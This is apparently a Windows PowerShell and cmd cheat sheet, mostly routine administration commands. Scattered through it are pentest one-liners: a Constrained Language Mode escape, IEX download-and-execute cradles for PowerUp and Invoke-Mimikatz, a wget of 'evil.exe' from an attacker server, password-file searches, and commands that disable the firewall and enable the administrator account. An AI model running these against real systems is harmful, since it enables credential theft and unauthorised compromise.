
Windows (Powershell & cmd)

Powershell Commands

Useful Cmdlets (and aliases)

| What it does | Command | Aliases |
|---|---|---|
| Get directory listing | Get-ChildItem | ls, dir, gci |
| Copy a file | Copy-Item src.txt dst.txt | cp, copy, cpi |
| Move a file | Move-Item src.txt dst.txt | mv, move, mi |
| Find text within a file (1) | Select-String -path c:\users\*.txt -pattern password | |
| Find text within a file (2) | ls -r c:\users -file \| % {Select-String -path $_ -pattern password} | |
| Display file contents | Get-Content file.txt | cat, type, gc |
| Get present directory | Get-Location | pwd, gl |
| Get a process listing | Get-Process | ps, gps |
| Get a service listing | Get-Service | |
| Formatting output (Format-List) | ls \| Format-List -property name | |
| Paginating output | ls -r \| Out-Host -paging | |
| Get the SHA1 hash of a file | Get-FileHash -Algorithm SHA1 file.txt | |
| Exporting output to CSV | Get-Process \| Export-Csv procs.csv | |

Info gathering:

Working with Zip files:

Expand-Archive -Path Draft.Zip -DestinationPath C:\Reference
Expand-Archive -Path Draft.Zip
https://stackoverflow.com/questions/9682024/how-to-do-what-head-tail-more-less-sed-do-in-powershell/41626586
gc log.txt | select -first 10 # head
gc -TotalCount 10 log.txt     # also head
gc log.txt | select -last 10  # tail
gc -Tail 10 log.txt           # also tail (since PSv3), also much faster than above option
gc log.txt | more             # or less if you have it installed
gc log.txt | %{ $_ -replace '\d+', '($0)' }         # sed

CMD stuff

cipher /U /N

Alternate Data Stream https://www.howtogeek.com/howto/windows-vista/stupid-geek-tricks-hide-data-in-a-secret-text-file-compartment/

Language Mode

Check current language mode

$ExecutionContext.SessionState.LanguageMode

Escape Constrained Language Mode

Using psby.exe obtained from here: https://github.com/Resilient-Ninja/Privilege-Escalation-Windows

PS > Invoke-WebRequest -Uri http://10.10.14.25/psby.exe -OutFile C:\windows\system32\spool\drivers\color\psby.exe

PS > C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U C:\windows\system32\spool\drivers\color\psby.exe

https://techvomit.net/useful-powershell-commands/

Where is a binary:

C:\Windows\System32\where.exe cmd.exe
echo $Env:Temp

Check if system is 64 bit

[Environment]::Is64BitOperatingSystem

Enable ISE using Powershell

Import-Module ServerManager
Add-WindowsFeature Powershell-ISE

securely store credentials in xml for import (Export-CliXml protects the password with DPAPI, so the file only decrypts for the same user on the same machine)

$cred = Get-Credential
$cred | Export-CliXml <location>.clixml
$cred2 = Import-CliXml <location>.clixml
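Added example (not from the original page) that shows what the Export-CliXml / Import-CliXml round trip above actually writes to disk: the user name is stored in clear, the password is a DPAPI-protected SecureString blob. It assumes Windows PowerShell (on non-Windows hosts the SecureString is not DPAPI-protected) and uses a constructed sample credential and a hypothetical helper name.

```powershell
# Added example, not part of the original page. Demonstrates that a PSCredential
# exported with Export-CliXml keeps the user name in clear text while the
# password is serialized as a DPAPI blob bound to the current user and machine.
function Test-CliXmlCredential {
    param([string]$Path = (Join-Path $env:TEMP 'demo-cred.clixml'))

    # Constructed sample credential; in real use call Get-Credential instead
    $pw   = ConvertTo-SecureString 'Sample-P@ss-123' -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential('demo\svc-sample', $pw)

    $cred | Export-CliXml -Path $Path
    $raw  = Get-Content -Path $Path -Raw

    # Round trip: only the same user on the same machine can decrypt the blob
    $back      = Import-CliXml -Path $Path
    $plainBack = $back.GetNetworkCredential().Password

    Remove-Item -Path $Path -ErrorAction SilentlyContinue

    [pscustomobject]@{
        UserNameStoredInClear = [bool]($raw -match 'demo\\svc-sample')   # True
        PasswordStoredInClear = [bool]($raw -match 'Sample-P@ss-123')    # False
        RoundTripMatches      = ($plainBack -eq 'Sample-P@ss-123')       # True
    }
}

Test-CliXmlCredential
```

Copying the .clixml to another account or host gives an Import-CliXml error rather than the password, which is the property the heading relies on.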

command output to file

| Out-File <location>
Invoke-AllChecks | Out-File C:\temp\output.txt

command output to clipboard

Command | Clip

download file

Invoke-WebRequest -Uri $url -OutFile $output
(New-Object System.Net.WebClient).DownloadFile($url, $output)

Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('http://192.168.1.3','C:\temp\launcher.bat')"

Download Powerup With Powershell <= V.2.0

$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1","C:\Temp\PowerUp.ps1")

# one-liner alternative:
(New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1","C:\Temp\PowerUp.ps1")


# another one:
powershell.exe -ep bypass -c IEX ((new-object net.webclient).downloadstring('http://target.com:8080/robots.txt'))

USING POWERUP

import-module c:\PowerUp\powerup.ps1
# Run all the checks
Invoke-AllChecks

PowerUp one-liner

#Get PowerUp, run it, and output to a text file so we can read the output easily.
powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks > C:\Temp\PU.txt

Powershell MIMIKATZ

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

Tail a logfile

# You can effectively tail -f the last two lines from a log file with the following:
Get-Content logfile.log -Tail 2 -Wait

Run powershell script to get around execution of scripts disabled error

powershell -ExecutionPolicy Bypass -File <file>.ps1

Download SYSINTERNALS

# First you need to ignore ssl trust:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

# then you can download it:
(New-Object System.Net.WebClient).DownloadFile("https://download.sysinternals.com/files/SysinternalsSuite.zip","C:\Temp\sysinternals.zip")

Get hostname:

$env:computername

List local accounts on a system:

Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"

Check if system is joined to a domain or a workgroup:

if ((gwmi win32_computersystem).partofdomain -eq $true) { write-host -fore green 'This system is on a domain' } else { write-host -fore red 'This system is part of a workgroup' }

SET ENVIRONMENT VARIABLE

$env:<name>="stuff"

SHOW ENV VARS IN RUNNING SCRIPT

gci env:* | sort-object Name
Resource: https://stackoverflow.com/questions/39800481/display-all-environment-variables-from-running-powershell-script

Get list of running processes:

Get-Process

Get-WmiObject win32_process | Select-Object Name,@{n='Owner';e={$_.GetOwner().User}}

CHECK IF SYSTEM IS RUNNING A DESKTOP VERSION OF WINDOWS

$windesktop = (gwmi win32_operatingsystem).OperatingSystemSKU -notmatch "(\b[7-9]|10|1[2-5]|1[7-9]|2[0-5])"
if ($windesktop)
{
    write-output "OS is a flavor of Windows Desktop"
}

GET WINDOWS KERNEL VERSION

[Environment]::OSVersion.Version

GET LIST OF IPV4 ADDR

(gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -ne $null }).ipaddress
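Added example (not from the original page) that rolls the host checks above (hostname, domain membership, desktop vs. server, kernel version, 64-bit test, language mode, IPv4 addresses) into one object so they can be recorded consistently. It goes slightly beyond the page by using Win32_OperatingSystem.ProductType (1 = workstation, 2 = domain controller, 3 = server) instead of the SKU regex; the function name is hypothetical.

```powershell
# Added example, not part of the original page. Consolidates the individual
# info-gathering one-liners into a single inventory object using built-in cmdlets.
function Get-HostInventory {
    $os = Get-WmiObject -Class Win32_OperatingSystem
    $cs = Get-WmiObject -Class Win32_ComputerSystem

    # ProductType is a cleaner desktop/server test than matching SKU numbers
    $role = switch ($os.ProductType) {
        1       { 'Workstation' }
        2       { 'DomainController' }
        3       { 'Server' }
        default { "Unknown($($os.ProductType))" }
    }

    # Same source as the IPv4 one-liner, restricted to enabled adapters and IPv4
    $ipv4 = Get-WmiObject -Class Win32_NetworkAdapterConfiguration |
        Where-Object { $_.IPEnabled -and $_.IPAddress } |
        ForEach-Object { $_.IPAddress } |
        Where-Object { $_ -match '^\d{1,3}(\.\d{1,3}){3}$' }

    [pscustomobject]@{
        Hostname      = $env:COMPUTERNAME
        Domain        = $cs.Domain
        DomainJoined  = [bool]$cs.PartOfDomain
        LogonServer   = $env:LOGONSERVER
        Role          = $role
        OSCaption     = $os.Caption
        KernelVersion = [Environment]::OSVersion.Version.ToString()
        Is64Bit       = [Environment]::Is64BitOperatingSystem
        LanguageMode  = $ExecutionContext.SessionState.LanguageMode.ToString()
        IPv4          = @($ipv4)
        CollectedAt   = (Get-Date).ToString('o')
    }
}

# Run it and keep a record, as the page does with Out-File / Export-Csv
$inv = Get-HostInventory
$inv | Format-List
$inv | Export-Csv -Path "$env:TEMP\host-inventory.csv" -NoTypeInformation
```

On PowerShell 7 replace Get-WmiObject with Get-CimInstance; the class and property names are the same.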

CHANGE HOSTNAME

$ComputerInfo = Get-WmiObject -Class Win32_ComputerSystem
$ComputerInfo.Rename("new_name")

LOG SCRIPT OUTPUT TO FILE

Start-Transcript -path c:\windows\temp\interesting.log -Append -force

# do stuff

stop-transcript
exit 1001

WGET

wget http://<evil server>/evil.exe -Outfile evil.exe

Check Permissions For Folder

icacls <path>

NETSTAT WITH FIND

# This is an example of what I equate to running netstat and piping the results through grep in Linux. In PowerShell however, you need to escape the double ticks or it will throw an error:

netstat -anob  | find `"443`"

Look for files with passwords:

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*

Disable firewall

netsh advfirewall set allprofiles state off

Make administrator user active

net user administrator /active:yes

Set user password to never expire

net user user /expires:never /active:yes /logonpasswordchg:no

Netstat (show listening ports):

cmd /c "netstat -a"

CMD

Useful cmd one-liners:

Open event viewer from cmd:

eventvwr

View the status of a service:

sc query <service name>

Stop service:

sc stop <service name>

Start service:

sc start <servicename>

Open services msc:

services.msc

Lists all the service information for each process:

tasklist /svc

Kill a process by PID:

taskkill /pid <pid> /f

Kill firefox (or any process) by name:

taskkill /im firefox.exe /f

Delete a file:

del <file name>

List drives:

fsutil fsinfo drives

Show users with active sessions:

quser or query user

Show active network sessions:

netstat -vb

Get last modified file in a directory (conceptually similar to ls -lart):

dir /O:D /T:W /A:-D

Rename file:

move file new-file-name

Show contents of file:

type file.txt

Current user and privilege info

whoami /all

List users

net users

List domain users and output to a file

net user /domain > domain-user-list.txt

List domain controller the current system is authenticated with

echo %LOGONSERVER%

Get FSMO roles for current domain (useful info about domain controller setup)

NETDOM QUERY /D:targetdomain.com FSMO

List all domain controllers in the current domain

net group "Domain Controllers" /domain

Print password policy

net accounts

Reboot system

shutdown -r

Query the registry

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Remove a key from the registry

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f

Show environment variables

set